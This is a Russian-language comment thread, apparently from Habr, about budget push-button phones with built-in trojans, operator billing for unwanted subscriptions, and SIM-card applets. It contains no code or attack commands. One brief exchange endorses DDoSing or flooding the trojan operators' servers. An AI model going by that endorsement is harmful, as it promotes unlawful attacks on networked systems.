01.09.2021 00:27+2Покупайте только проверенные мировые бренды: телефоны Nokia не содержат вредоносной функциональности,
Как вы пришли к такому выводу?
У меня были подозрения на то, что бабушкин телефон лазает в Интернет (судя по детализации из ЛК оператора; прошивки не копал) и это была именно Nokia
ValdikSS Автор
01.09.2021 00:31+19Если Nokia добавит отправку СМС или бекдор в свои устройства, об этом станет известно гораздо быстрее, чем в случае в местечковыми брендами. Покупая устройство бренда, который известен на весь мир, вы с куда большей вероятностью получаете только заявленные функции.
Читал, что Nokia на KaiOS выходят в интернет (как и другие смартфоны, хоть и кнопочные), но они это делают для синхронизации времени и проверки обновлений ОС.
Usper
01.09.2021 18:04+1Относительно старенькая nokia 130 при первом включении после сброса отправляет сообщение для "активации устройства с приблизительным местоположением вашего устройства". О чём честно предупреждает, но зачем аппарат вообще это делает? Отменить похоже нельзя, в сообщении сказано, что эта информация может быть передана "авторизованным третьим лицам" в т.ч. "в другие страны согласно действующему законодательству".
ValdikSS Автор
01.09.2021 21:16Интересно, в интернете на русском есть только одно упоминание этого сообщения: https://forum.allnokia.ru/viewtopic.php?t=110507&start=360
Можете сбросить телефон и выбрать английский язык, чтобы посмотреть, как выглядит сообщение на английском?
Usper
02.09.2021 08:50Сообщение выглядит так:
"Thank you for choosing Nokia. By continuing, a device activation message with a one-time location of the device is sent to Nokia. Sms or data transmission charges may apply. Lern more about privacy in options." В опциях примерно тоже что и на русском о заботе о персональных данных, которые могут быть переданы авторизованным третьим лицам. В этом окне можно только продолжить, посмотреть уверения о заботе о персональных данных (в отдельном окне) или сделать звонок в службы ЧС. Отменить отправку нельзя, на красную кнопку не реагирует. Модель телефона RM-1035.
hqqddy
02.09.2021 09:53+1С Нокией (финской еще) были такие приколы еще на Симбиане, при первом включении отправлялась смс, а и да, еще и Nokia N9 на Миго так делала
https://allnokia.ru/faq/mobile/nokia-n9/
Как отменить подписку на рассылку Nokia (советы и предложения)?
Там это твикером можно было отключить (потому что после закрытия бизнеса отключение через настройки уже не работало), а на симбианах тоже рутануть прошивку и отключить, деталей уже не помню. Вроде как и аналитек всея руси (Муртазин) об этом писал в свое время.
hqqddy
02.09.2021 10:22+1т.е. это была смс на платный короткий номер. небольшой скандал был по этому поводу. но щас найти сложно подтверждения и описание.
geher
02.09.2021 21:23Nokia N9 на Миго так делала
Вот не помню за ней такого. У меня было последовательно два таких аппарата. При первом включении ничего не отправлялось. Разве что такое самое первое включение выполнял продавец в порядке предпродажной подготовки.
Taciturn
01.09.2021 21:33Читал, что Nokia на KaiOS выходят в интернет (как и другие смартфоны, хоть и кнопочные), но они это делают для синхронизации времени и проверки обновлений ОС.
2720 Fold, прошивка 21.00.17.01. Каждые два часа лезет в интернет, проверка обновлений отключена сразу, для теста отключал вообще всё, что можно отключить — в том числе синхронизацию времени — время уползает, лезть в интернет не перестаёт. Если отключить интернет со стороны оператора, то но включить синхронизацию времени, то с временем всё Ok, без всякого интернета.
На предыдущей прошивке такого не было, от батареи телефон работал дольше. Жалею что обновился, откат не предусмотрен.
DaneSoul
01.09.2021 09:04+1У родственника было подобное на Philips E109 — простейшая трубка без интернета, но в биллинге снималось за интернет. В офисе оператора сказали, что интернет запрос уходит при выборе определенных пунктов в меню.
Andzhil
04.09.2021 20:04+1. На телефоне Philips E182 проявилась функция хождения в Инет строго каждый день за какой-то инфой на несколько килобайт. Как выяснилось по итогу, на тарифе без Интернета за это списывалось порядка 2 или 3 руб. в день. Пришлось оформлять подписку на Интернет только ради того, чтобы просто пользоваться телефоном.
DaneSoul
04.09.2021 20:24+1Не знаю как у остальных операторов, но на МТС этот родственник бесплатно подключил полный запрет интернета и списания прекратились. Причем, этот запрет можно подключить только в магазине оператора, в интернет кабинете такой опции нет (дело было в прошлом году, сейчас не знаю как работает)!
nlykl
04.09.2021 21:27В личном кабинете нужно не искать запрет, а отключать услугу "Мобильный интернет".
DaneSoul
04.09.2021 21:45Я уже не помню детали, но на тот момент сотрудник магазина МТС сказал что полный запрет можно сделать только у них, через кабинет нельзя.
Popadanec
05.09.2021 08:45Зависит от погоды на Марсе. Временами даже контентный счёт разрешают через ЛК подключать, не то что интернет полностью отключать.
dartraiden
28.09.2021 02:03У Теле2 это именно услуга «Запрет доступа в интернет» и её нужно подключать в личном кабинете.
Ещё можно позвонить оператору горячей линии и попросить отключить доступ в интернет.
Я делаю и то, и другое, на всякий случай.
tuxi
01.09.2021 01:06+4Я верю, что скоро создадут сообщество, которое будет щедро и часто рассылать фейковые данные на эти сервера…
Alonerover
02.09.2021 17:28+1А ведь заDDOS'сить этих паразитов — идея отличная.
axe_chita
03.09.2021 21:59+1Поддерживаю, только не заDDOS'сить, а устроить хабраэффект
tormozedison
05.09.2021 17:18Эти домены на Алибабе зарегистрированы, можно туда написать.
axe_chita
05.09.2021 19:34Как вариант пойдет, вот только желательно чтоб перед этим правоохранители «возбудились» и приняли дело к рассмотрению.
С официальной телегой проще будет.
MikUrrey
01.09.2021 01:19Кстати. Имеется кнопочный телефон Nokia, который включается сам. Выключаешь его в кино перед сеансом, а тут тебе раз - и посреди сеанса звонят. Приходится совсем батарею вынимать.
Судя по детализации, ничего не отправляет, поэтому больше похоже на глюк прошивки.
ValdikSS Автор
01.09.2021 01:27+2Это, наверное, включение и выключение по таймеру — нередкая функция. Использую её на Inoi.
Angeld
01.09.2021 10:04у Nokia и будильник в выключенном состоянии срабатывает
funnycar
01.09.2021 11:32+3Так у многих старых телефонов, вроде, были аппаратные часы, которые ходят даже когда телефон отключен.
urix
01.09.2021 15:16Именно так. Я любил делать выключение телефона на ночь и включение его поутру, чтобы никто не звонил (и батарейка экономилась).
Popadanec
01.09.2021 15:19+1Смартфоны(по крайней мере некоторые) так же умеют, причём по расписанию. И даже будильник сработает не смотря на то что смартфон выключен.
Arioch
02.09.2021 12:29Даже если включаться по расписанию не может, то смартфон можно в "самолётный режим" переключать.
Современный Андроид достаточно неплохо отстреливает батарейкопожирателей, а если какой-то из них очень нужен - то есть Island и прочие Working Profile
MikUrrey
02.09.2021 14:51+1Включаться по будильнику умели еще самые бюджетные моторолы в 2004-м. Это не какая-то супер-фича смартфона :)
DaemonGloom
03.09.2021 10:56Проблема в том, что с приходом коммуникаторов/смартфонов эта функция почти перестала встречаться. А старые телефоны такое умели почти все, да.
Aelliari
04.09.2021 12:52Андроиды это умели до эпохи шифрования, во время FDE - это умели некоторые, имеющие шифрование из коробки, при отключённом экране блокировки. Устройства с FBE из коробки - могут уметь это даже с активированной блокировкой экрана
shoorick
03.09.2021 09:31Будильник из выключенного состояния — знакомая история: у меня на Siemens SK65 такое было.
skobkin
01.09.2021 01:32+14Спасибо за статью. Буду скидывать тем, кто говорит "надоели ваши смартфоны, куплю кнопочную звонилку".
namikiri
01.09.2021 11:02+3Да уж, я теперь начинаю думать что старый смартфон с Lineage на борту побезопаснее будет, чем кнопочная звонилка-в интернет выходилка.
skobkin
01.09.2021 15:10+1LineageOS обычно не контролирует ту часть, которая называется firmware. Так что оно будет побезопаснее только частично.
namikiri
02.09.2021 10:35Да, в курсе про проприетарные блобы и загрузчик. Но тем не менее, если вдруг что-то подобное будет твориться, энтузиасты быстренько это дело спалят, как мне кажется.
skobkin
02.09.2021 16:19Если будут целенаправленно этим заниматься.
Ну и даже когда спалят - ничего не произойдёт - только другие энтузиасты об этом и узнают.
mSnus
01.09.2021 01:44+6Дешёвые не-кнопочные не лучше. Покупая дешёвый Haier, вы автоматически соглашаетесь на предустановку троянов, которые потом никак не вычистишь.
За статью спасибо, не знал, что кнопочные тоже заранее затроянены.
skobkin
01.09.2021 02:21+3И не дешёвые.
Если посмотреть на гитхабах-xda-4pda - можно найти кучу инструкций как с каких-нибудь флагманов выпиливать софт разной степени вредоносности.
Нет, дорогие телефоны обычно SMS не отправляют за вас, но вот стучаться на сервера статистики как минимум - вообще без проблем.
in_heb
01.09.2021 02:41+4Даже если вендор сам этого не делает, то вот гугловский софт (Google services), модифицировать который вендор не может, очевидно шлёт телеметрию, потому что данные это и есть суть бизнеса гугла
3aBulon
04.09.2021 07:25Доказательства есть? Haier нифига не дешевый и таки бренд, хотя смартфоны не их профиль.
Sabubu
01.09.2021 01:53+7…а что с приёмом СМС?
Ни один из купленных телефонов не предоставляет полноценный AT-порт через USB или Bluetooth. Чтение SMS-сообщений с компьютера не реализовано нигде.Если вас интересует прием СМС как можно дешевле, посмотрите в сторону GSM-модемов вроде A6, A7, SIM900. У них SPI-интерфейс, есть возможность отправки СМС, GPRS и даже звонки. На алиэкспрессе от 350 р. Правда, они новомодные 4G не поддерживают. Правда, я их не тестировал и гарантировать что-то не могу.
Ну и DNS, конечно, разочаровал. Вроде приличный магазин был.
ValdikSS Автор
01.09.2021 01:55+2Про SIM800, SIM900 знаю. Телефоны хотелось использовать именно по причине их доступности в обычных магазинах.
acc0unt
01.09.2021 02:41В итоге оказывается, что если их и можно для этого использовать, то только с кастомной прошивкой?
ValdikSS Автор
01.09.2021 10:33Да, причём дописывать свою функциональность придётся для каждой модели отдельно, прошивки чаще всего даже у похожих внешне/аппаратно моделей несовместимы. Это бесперспективная затея, учитывая, что телефоны выпускаются небольшими партиями и продаются не больше 2-2.5 лет.
svpcom
01.09.2021 20:30Прямо хоть свой кнопочный телефон делай на основе sim800 + stm32 + экран.
Странно, что до сих пор никто не пытался. Я несколько лет назад хотел было начать, но потом решил, что не смогу сделать качественно корпус и железо (что бы долго работало и мало места в кармане занимало)
drWhy
01.09.2021 20:50+2
svpcom
01.09.2021 23:09ну вот такое и НЕ хочется получить…
А хочется нормальный компактный кнопочный телефон и с минимумом функциональности и открытой прошивкой. Если кто соберется сделать железо, то я могу помочь с софтом.
Thero
02.09.2021 00:11уже есть опенфоны с опенсурс прошивками.. хз как это спасает от бэкдоров в симкарте, но уже лучше..
litos
02.09.2021 07:35Нужен опенсорс телефон с ESIM, интересно, такое реально?
Тогда скорее всего трояна не будет
Thero
02.09.2021 10:12Пожалуй да. Надеюсь ктонибудь в итоге сделает компактную плату с гсм стэком и поддержкой есим, но там полагаю куча регуляторных проблем..
id_potassium_chloride
04.09.2021 22:19Про ESIM не знаю, а вот VoIP есть -- WiPhone. Правда реализация мне всё равно не нравится, как-то костыльно что ли
svpcom
02.09.2021 08:35есть полтора телефона (pinephone и librem 5). Первый не доставляют в РФ, а второй уже четвертый год обещают сделать. Автономность у них меньше суток. Причем это больше компьютер с линуксом, чем телефон. opensource кнопочного телефона я не нашел (кроме концепта на ардуине в виде кучи плат и проводов с непонятной автономностью).
У меня требования к телефону такие: автономность от недели, удобное чтение sms, быстрый набор (возможность повесить несколько номеров на клавиши), календарь, диктофон и фотокамера. Без интернета и сторонних приложений.
От бекдоров в симкарте спасет только открытая прошивка модема, но тогда придется засунунуть внутрь limesdr и автомобильный аккумулятор. Но в случае бекдора в сим-карте понятно кому предъявлять претенизии, чем в случае noname телефона, который продает фирма-однодневка
vladkorotnev
01.09.2021 11:20Если через юзб, почему бы не взять просто USB-модем провайдерский и разлочить похожим боксом? Держу два таких, оба видятся как ttyUSBX, третий год полёт нормальный — главное сервисными командами запретить часть режимов, чтоб питания хватало точно.
Dare
01.09.2021 11:35Не напишете статью про нюансы и режим работы?
vladkorotnev
01.09.2021 11:38Да тут недавно кто-то уже описывал — у меня примерно такая же конструкция, разве что не на FreePBX и не на распберри https://habr.com/ru/post/550734
Но если софт свой городить, то и астериск не нужен — по сути модем висит, как и любой другой, на компорту.
А, ещё мне свой Е1550 приходилось разлочивать на голосовые звонки каким-то боксом как раз. Уже не вспомню, как назывался, помню, что разлочка голоса была что-то вроде 3 евро за 1 модем, при этом найденные на просторах АТ команды не помогали. Зато для отвязки от оператора помог как раз, емнип, написанный ОПом этой статьи генератор.
VIPDC
01.09.2021 13:38Мы в одном месте до сих пор используем старые телефоны nokia и ПО PC Suite.
10 лет полет нормальный
nitro80
01.09.2021 03:45+2Этот приличный магазин продаёт откровенный китай, но под своим шильдиком и в пару раз дороже.
StraNNicK
01.09.2021 15:57Всё так, но про дороже — не соглашусь.
Очень часто у них есть то же, что на Ali, по тем же ценам, но здесь и сейчас и с, внезапно!, гарантией.
JustDont
02.09.2021 15:29+3Днс в массе не продаёт (и не продавал) что-либо "в пару раз дороже". Хотя локальные ситуации вполне возможны, и при колебаниях курса доллара тоже бывало (днс очень резв в поднятии цен, в то время как мелкие вендоры могут еще долго продавать по старым ценам).
Но в массе у них вполне нормальные цены и довольно низкая маржа (за которую вы получите вещь "здесь и сейчас" и с нормальной гарантией).
belyvoron
01.09.2021 18:47Более новые поддерживают. SIM7600, например, умеет 4G. А SIM7000 - аж Nb-IoT. Вдобавок, поддерживают MQTT (и даже MQTTS) из коробки - можно слать pub/sub любому MQTT брокеру, даже в AWS/Azure прямо через At-команды.
Стоят, правда, уже не 3 копейки.
gus26
01.09.2021 02:09+3Интересно, а в смартфонах тоже трояны зашиты? Раз уж в кнопочные телы могут такое загнать, то в смартфон и подавно...
moooV
01.09.2021 04:28+6Лет пять назад купил жене дешёвый BQ тысячи за четыре. С первого взгляда был обычный телефон, но уже через три дня начали появляться левые игры пачками, засирали все меню запуска. Удаляешь - через полчаса снова появляются, да ещё и с новыми.
Сначала просто игнорировали. Потом ещё через пару дней начала лезть полноэкранная реклама при запуске любого приложения, даже системного. Будильник? Смотри рекламу. Погода? Реклама. Итд.
В общем, пользоваться стало нереально, сдали назад в DNS и вернули деньги, купили сяоми в пару раз дороже. Хоть и минимальная модель, но такой херни там не было.
Endru9
01.09.2021 09:27+4На двух Fly Compact тоже постоянно реклама была. Делаешь сброс до заводских настроек — дня 2-3 полет нормальный, и снова все возвращается. Конечно вылечилось всё с заменой прошивки, но осадок остался.
Кстати про сяоми: там тоже куча рекламы, в некоторых приложениях она уже отключается только на 30 дней! Через 30 дней операцию нужно повторять.
Мне не нравится современный подход к технике:
Купил смартфон — отключай рекламу!
Купил лицензию на винду — отключай рекламу…hollycon
01.09.2021 10:03+2Так это не подход к технике, это подход маркетологов к монетизации и к максимальному удешевлению любой электроники. Виток капитализма - электронику делаем дешевле, но отобьём своё за счет рекламы. В идеале - подписка. И теперь не только в железе, но и в ПО.
ValdikSS Автор
01.09.2021 10:35Я очень удивился, увидев во F+ Flip 3 игры по подписке. Их нельзя купить, их можно только арендовать на какое-то количество дней за платную СМС, но через один или два месяца их снова нужно будет оплачивать.
bgBrother
01.09.2021 16:47+1Интересно, каким образом маркетологи считают свой профит? Как можно говорить о «удешевлении», если оператор 35-45% от платной СМС забирает себе? И о каком промежутке времени и ЦА они говорят, когда подсчитывают прибыль из аренды приложения? Вероятно, проще было поднять стоимость смартфона на 20 баксов…
wataru
01.09.2021 20:18+4А с чего вы взяли, что они что-то считают и цену снижают на примерную сумму заработка от рекламы и троянов? Нет, они просто впендюривают рекламу для дополнительного заработка — сверху к цене.
StraNNicK
01.09.2021 16:00пот поэтому я и перестал брать сяоми. С 1+ таких проблем нет.
Т.е. это всё-таки не современный подход к технике, это проблемы отдельных производителей.
Arioch
02.09.2021 12:23Oppo/OnePlus другое поветрий подхватили, убирают разъёмы для наушников и слоты MicroSD
В принципе, на современных версиях Андроида и смартфонах отдельный слот под microSD уже и в самом деле не сильно полезен, но наушники иногда лучше проводные.Впрочем, сколько людей - столько и мнений.
bopoh13
01.09.2021 02:11+14Наконец раскрыта тайна, как новый номер телефона попадает в списки рассылки.
in_heb
01.09.2021 02:43+4Нет, всё куда проще, номеров не так много и модно обзвонить все номера РФ за день
blind_oracle
01.09.2021 10:21Пора переходить с номеров на UUID или публичные ключи аля Tox :)
morijndael
01.09.2021 11:00+1Тут десять цифр некоторые запомнить не могут, а вы предлагаете перейти на UUID?
vladkorotnev
01.09.2021 11:21+10Кто-то десять цифр запомнить не может, а у кого-то в голове до сих пор J3QQ4-...
StraNNicK
01.09.2021 16:01его ещё помню, а вот на w95, который раньше помнил не хуже, уже всё, стёрся из памяти.
DMGarikk
01.09.2021 17:18в большинстве (если не из всех) пиратских дистрибов w95, запрос серийника был выковырнут из инсталлятора
vladkorotnev
01.09.2021 17:39Да там и так была проверка чуть ли не уровня "сумма всех цифр равна 95" и серийники были подстать, типа 1111-111011
zuek
10.09.2021 09:45w95 и офис 97 я всегда "активировал" датой рождения владельца + цифра, доводящая сумму всех цифр в серийнике до кратного 7. Например, если дата рождения 01.01.1921, то серийник будет 0101212 (это после префикса, который за давностью уже забыл, и попытки найти в интернетах повергли лишь в уныние, т.к. мне помнится что-то типа 40 или 040, а поиск выдаёт совершенно иные префиксы CD-Key)
blind_oracle
01.09.2021 12:39+2Я помню только номера жены и детей. Ну, ещё родителей т.к. этим номерам уже 20 лет и забыть уже не могу) А, ну еще свою аську зачем-то.
Остальные то зачем помнить? Или речь про свой номер?
achekalin
01.09.2021 06:50+5Что творится на более «умных» телефонах, остается только догадываться. Куда, скажем, отстукивается безродный (да и «родовитый») китайский смарт - о, там могут быть варианты, а, поскольку он «смарт» то он еще и может в разное время делать разные вещи, и обновлять свои умения!
eurol
01.09.2021 08:50Смарт или не смарт — тут большой разницы нет. В любом случае телефон может скачивать что хочет, когда хочет — дело-то в прошивке.
Единственная разница — у смарта больше места, куда можно записать относительно незаметно любое гадкое ПО.
VIPDC
01.09.2021 13:43+1Со смартами проще. Поставил norootfirewall и всё попытки обратится обрубаются. Потом используя ADB гасим всех кто пытался действовать самостоятельно.
Приводил в порядок так телефон Fly маленький который использовал как точку доступа. После чистки стал работать в 4-е раза больше.
Golex
01.09.2021 07:05+7Спасибо! Уже казалось нет иллюзий в этом вопросе, а вам удалось сорвать покровы.
smart_alex
01.09.2021 07:34+18Прочитал статью и выпал в осадок — как такое вообще возможно — официально продавать телефоны с троянами и сливанием пользовательского счёта?
Особенно пикантно выглядит целевая аудитория — у бабушки без SDR и базовой станции не много шансов понять куда и как утекают деньги с её счёта.
А про доказать кому-то, что «бабушка» не сошла с ума, а это телефон САМ расходует средства — вообще речи не идёт.
Jsty
01.09.2021 09:30+1Было такое дело с телефоном, модель которого даже не вспомню.
Он ходил в интернет, при этом в функциях этого не было и браузера в телефоне так же не было.
В итоге удалось в документации производителя раскопать, что телефон ходит в интернет для, внимание, синхронизации времени(!). Ни в каких характеристиках в интернет-магазинах про интернет не было ни слова (в том числе аббревиатур типа GPRS).
Пришлось через оператора запретить интернет вовсе, т.к. бабушке интернет ни в каком виде на кнопочной звонилке не был нужен.
F0iL
01.09.2021 11:56телефон ходит в интернет для, внимание, синхронизации времени(!)
Жесть какая. Вот радости будет человеку, который уехал в отпуск в другую страну, и там с него разом списали 399 рублей за один выход в интернет по GPRS просто потому что звонилке захотелось синхронизировать время.
Borz
02.09.2021 08:45в своё время, мне один красный оператор вернул деньги за "использованные" услуги. Возврат инициировали сами, но по заявке от меня с вопросом "что за фигня?". Причиной возврата денег обозначили типа "списание средств за услугу без технической возможности её предоставления".
Popadanec
02.09.2021 09:52А не вернули бы и вы с каким то шансом могли пойти в суд, а там многое может всплыть, да и иск стать коллективным. Вот они и балансируют.
Arioch
02.09.2021 12:36+1МТС весёлые ребята, они и сами подписывают, и прячут из личного кабинета. Во всяком случае, делали так лет 5-10 назад. Купили тогда USB-модем, сразу вошли в личный кабинет, отключили все платные услуги. Месяц было хорошо, потом деньги "потекли". Куда потекли? Оказалось на услугу "Гудок", если помните такую. Замена у звонящих мне стандартного тона вызова на мелодии. Вот только НА МОДЕМ мне сроду никто не звонил. А поддержка МТС включила дурака -
- у вас подключена платная мелодия, сами так выбрали
- у меня в л/к указано отсутствие платных услуг
- правильно, у вас их и нет
- а деньги за что списываются
- за мелодию
- а мелодия откуда взялась
- настройка услуги "Гудок"
- значит мелодия - часть услуги "Гудок"
- да
- значит услуга "Гудок" платная. Почему л/к врет, что бесплатная.
- л/к правильно пишет, бесплатная
- если бесплатная - верните деньги, которые на эту услугу списали
- у вас выбрана платная мелодия, правильно списаны
И по такому кругу три дня. ПОТОМ вернули.
nlykl
01.09.2021 12:56+2Офигеть. А разве сама по себе сеть GSM не умеет синхронизировать время?
ValdikSS Автор
01.09.2021 13:01По непонятной причине, время через GSM синхронизируется только на Inoi. На трубках под Spreadtrum и MTK только через интернет либо установкой вручную.
tormozillo
02.09.2021 14:10Был у меня телефон Lumia который на Windows, так в нем выбор был как синхронизировать время: по сети GSM или через интернет по ntp. Хорошо запомнил что в сети оператора с точностью времени бардак полный был, один раз ночью само на полтора часа назад ушло и будильник "проспал". Поэтому только через интернет.
balamutang
01.09.2021 14:29+2Можно синхронизировать по сети GSM, но там кстати не всегда все ровно, у меня например час добавляет, видимо в сети время московское, постоянно отключаю эту функцию.
Вообще конечно неправильно синхронизировать все (дату/часы/минуты/секунды), надо синхронизировать только секунды (за сутки встроенный таймер не уйдет далеко), но почему-то до такой простой вещи ни у кого руки не доходят.
JPEGEC
16.09.2021 08:51+2С секундами плохая идея. Убежит на полминуты время и возникнет разница минут а вы опа и секунды поправили, оставив минуты.
Или при смене времени при движении.
Обновлять нужно все. Включая год.
alexleo
01.09.2021 12:15+1Я после поездки за границу с удивлением узнал, что у МГТС при подключении к сети телефон отправляет небольшой служебный пакет, который выглядит, как обычное интернет-соединение. Не знаю, что это было, но я так понял, что это какая-то особенность протокола. Только вот некоторые особо жадные забугорные операторы при этом радостно включают этот пакет в биллинг, как будто вы сами в интернет ходили, а МГТС не менее радостно списывает с вас оплату за использование интернета в роуминге, когда интернет на телефоне отключен. При этом, судя по биллингу, некоторые операторы за границей отлично понимают, что никакой это не интернет, и подобной глупостью не занимаются, но, увы, не все.
Изюминка тут в том, что в МГТС у вас кредитная система оплаты с лимитом, и как только за счёт таких списаний вы уходите за этот лимит, телефон вам отключают, и даже пополнение счёта не позволяет включить его обратно. Мне ещё повезло, дата выставления счёта была примерно сразу после возвращения на родину, но в интернете видел отзыв, как люди неделю сидели без телефона.
smart_alex
01.09.2021 07:37+1Столкнулся с обратной ситуацией — телефон старый, брендовый и на 100% проверенный и надёжный — при подключении к нему некоторых новых симок начинается НЕСАНКЦИОНИРОВАНННАЯ активность ТИХИЕ (СКРЫТЫЕ) звонки и СМС на платные номера опсоса.
При обращении в техподдержку опсос делает покерфейс и заявляет, что это я сам (дурак) и (видимо в порыве пароксизма) звонил на платные номера. Что конечно не так, как минимум по двум причинам:
1. Я вообще никуда не звонил (не брал в руки телефон) за тестовый период
2. Я не знал эти номера, поэтому физически не мог на них звонить и посылать СМС
Отсюда вопрос: что это было и могут ли симки жить своей жизнью и использовать телефон для несанкционированных звонков и рассылки СМС?
Syzd
01.09.2021 08:33скажите название оператора?
smart_alex
01.09.2021 08:46+3Описываемый случай произошёл с Мегафоном. Они за 24 часа после покупки их симки слили со счёта 600 рублей на свои платные номера. Техподдержка заявила, что это я сам звонил на их платные номера и если меня что-то не устраивает, то я могу подать на них в суд.
На следующий день (официально) расторгнул договор и забыл о Мегафоне, как о страшном сне, но вопрос о несанкционированной активности симки остался открытым.
Cirno_9
01.09.2021 09:54+3Поневоле вспоминается случай, как у чувака гаражные ворота сами подписались на несколько развлекательных рассылок. Тут и чисто хардовые Sim800/900 не спасут, наверное.
simpleadmin
01.09.2021 11:19+3У меня нокиа 5110 на пожарной сигнализации трижды на различные рассылки "подписывалась". Окончательно "отписаться" помогло только письменное заявление в МТС.
urix
01.09.2021 15:21-1Ну, у меня модем на Теле2 подписался на рассылки, было дело.
При этом, в отличии от Мегафона, деньги за подписки не вернули. Мегафон хотя бы возвращает эти деньги, Теле2 - свои правила, мы вам ничего не вернём.
Popadanec
01.09.2021 15:26+2Модемы действительно сами подписываются. Это механизм обновления прошивки. Нужно было прийти с модемом к ОПСОСу и потрясти им перед глазами человека там работающего, тогда бы вернули точно.
booyakacrew
12.09.2021 15:25Не совсем, на сколько я знаю, там по IMEI модемам подписку со специальным USSD-меню подсовывают, так как "механизм обновления прошивки" не умеет подтверждать второй USSD-код.
Popadanec
13.09.2021 10:06Т.к. к IMEI имеет доступ только ОПСОС, то на лицо умысел, который реально доказать в суде? Вся проблема только в размере ущерба. И возможности для других о деле узнать и повторить.
alexleo
01.09.2021 12:20Я ушёл с мегафона после трёх случаев подписки не понятно на что. В двух случаях, по их словам, это была "отправленная смс", в третьем — их приложение, якобы я в него зашёл и подписался. При этом минимум в одном случае (в других не помню) телефон в момент подписки просто был отключен, т.к. батарея сдохла, а о подписке я узнал из смс, которое пришло после включения телефона. У меня были (и остаются) некоторые подозрения, что проблема могла быть и в телефоне, но случай "подписки через приложение", скорее, говорит об обратном. Хотя за десять лет до этих случаев ни разу подобного не случалось.
Ontaelio
01.09.2021 14:43+8я могу подать на них в суд
У меня и бабушку, и маму Билайн подписывал на всякие сервисы типа знакомств. Причем у бабушки, пока разобрались, пчеловоды наковыряли под 9 тыр за несколько лет. Поддержка, разумеется, впадала в режим "это вы сами, подавайте в суд, если хотите".
Нюанс в том, что они уверены, что подавать вы никуда не будете. Но бабушка у меня была кремень, она всю жизнь проработала архитектором в исполкоме и умела и в суд, и в канцелярит. Поэтому было написано заказное письмо с уведомлением, где в доступной форме описывались все дальнейшие действия (тот самый суд и прокуратура). Деньги вернули через пару дней после получения эпистолы, причем в том размере, который насчитали мы, а не сам Билайн.
leonidy85
07.09.2021 16:11+1у меня валяется старенькая нокиа в качестве звонилки, включаю раз в пару месяцев, так вот мне мегафон за то время что телефон был выключен сделал пару подписок, обнулил баланс, благо там всего было 200р и на вопрос как так то, сказал что возможно телефон кто то из родственников или знакомых включил...
Вообщем договор с ними разорвал.
axe_chita
08.09.2021 05:05«Папа с детьми разбирается проще, сложит в авоську, и в ванной полощет»
МТС вариант с безмолвно лежащим телефоном решает проще, если вы не совершали платных действий (звонков/смс) в сети оператора в течении 3-х месяцев, то вас автоматом переводят на тариф с ежедневным списанием средств. Перед этим, вам прилетает смс с предупреждением, а там вы решайте сами «сделать звонок другу», или «гулять так гулять! плачу за всё!»Popadanec
08.09.2021 10:04Похожим образом действуют все ОПСОСы, потому что номеров не хватает.
YMA
08.09.2021 10:20Не то что не хватает, получить номерную емкость можно без особых проблем. Просто номера - платный ресурс, и простаивающий номер раздражает оператора. ;)
Popadanec
08.09.2021 15:10Судя по тому как номера вручают порой уже через две три недели после расторжения контракта с предыдущим абонентом, я бы не был так уверен.
GordeyUA
01.09.2021 18:05+1Главное отличие - эппл выводит предупреждение, что будет отправлена СМС и возможно, за это спишутся деньги. И дает возможность отказаться. Если бы китайцы делали так же - вопросов бы не было.
anonymous
00.00.0000 00:00ValdikSS Автор
01.09.2021 10:44+10могут ли симки жить своей жизнью и использовать телефон для несанкционированных звонков
Да, могут. SIM-карта — это мини-компьютер со своей операционной системой и расширенными привилегиями, которая может обновляться сервисными СМС или через интернет. Она может сама инициировать отправку SMS-сообщений (что делает моя SIM Билайн, например, если определяет, что её вставили в другой телефон, не в тот, в котором она находилась в прошлый раз), совершать звонки (не уверен, что скрытые, но обычные — точно может), выходить в интернет (как просто инициировать открытие страниц на телефоне, так и обновлять свои апплеты через интернет).
Я находил в интернете жалобы на то, что SIM-карта отправляет СМС на свои сервисные бесплатные номера в роуминге, а в роуминге они принадлежат роуминговому оператору и тарифицируются отдельно:
https://cells.ru/forum/read.php?3,1535099,1535099#msg-1535099
https://zvonok.octo.net/number.aspx/0494
Также в картах встречаются уязвимости. Атака simjacker позволяет подделать сервисные СМС и отправить их самостоятельно: https://simjacker.com/
Про возможности карт рекомендую посмотреть видео от Funbox — компании, которая встраивает сервис СМС-подписок на кнопочные телефоны: https://www.youtube.com/watch?v=CumGQSX6_ws
Meklon
01.09.2021 10:53+1Я обычно сразу удаляю приложение SIM-меню. Так себе защита, но хоть пуши перестает вываливать.
smart_alex
01.09.2021 11:11+2Спасибо за разъяснение, теперь понятно, что происходит, когда вставляешь симку от Мегафона в телефон.
Особый привет техподдержке Мегафона, которая пыталась убедить меня, что я сошёл с ума и сам позвонил (несколько раз!) по их платным номерам.
vsb
01.09.2021 08:00+10Вообще я считаю, что в современном мире утеряны секреты создания хороших кнопочных телефонов. Я своим пожилым родственникам не один раз покупал кнопочные телефоны и их качество очень низкое. В первую очередь софт - всё дико тормозит. Предполагаю, что их разрабатывают исходя из минимизации затрат и отсюда все проблемы. Т.е. их делают не для людей, которым нужен кнопочный телефон, а для людей, которым нужен максимально дешёвый телефон.
Поэтому недавно я поискал старые телефоны и нашёл людей, которые продают их в хорошем состоянии, на вид как новые. И цена вполне приемлема.
В общем моя рекомендация желающим пользоваться кнопочным телефоном - купить именно старый телефон. Софт там вылизан не в пример современному, ничего не тормозит, аккумулятор работает дольше и качество изготовления выше, если брать хорошую модель.
mikelavr
01.09.2021 08:50+3Только вот аккумулятор за годы лежания без эксплуатации скорее всего потребуется заменять на свежий - и он будет хуже оригинала.
seraz
19.11.2021 10:18видел как собирали аккумы из нескольких новеньких +-хороших из имеющихся в сц/магазинах побрендовее. это для планшетов/ноутов. т. е. у вас трабла будет только найти нужного размера банку. потом перепаять плату с старого на новый. м. быть та банка и чуть меньше или чуть толще окажется, не суть. главное чтобы влезло в корпус, крышка закрылась и тп.
Angeld
01.09.2021 10:13так старые протоколы везде есть
gsm так обязательно
это 3g/4g не везде доступны
тут больше с современным веб проблема, который на 2g работать не может
Aleshonne
01.09.2021 10:58+5Например, Tele2 в Москве и области работает только на 3G и 4G. Протоколы 2G и ниже не поддерживаются.
jazzl0ver
01.09.2021 14:08В Питере такая же фигня с 2G у Теле2
Linulin
07.09.2021 16:04Видимо, зависит от радио-частоты, используемой конкретной моделью телефона, так как 2G у Tele2 в Питере пока ещё поддерживается.
ilyamodder
01.09.2021 14:59iMessage тоже не требует, просто по номеру телефона работать не будет, если отказаться. FaceTime вроде оттуда же возьмет телефон, ибо зачем два раза смс отправлять
anonymous
00.00.0000 00:00balamutang
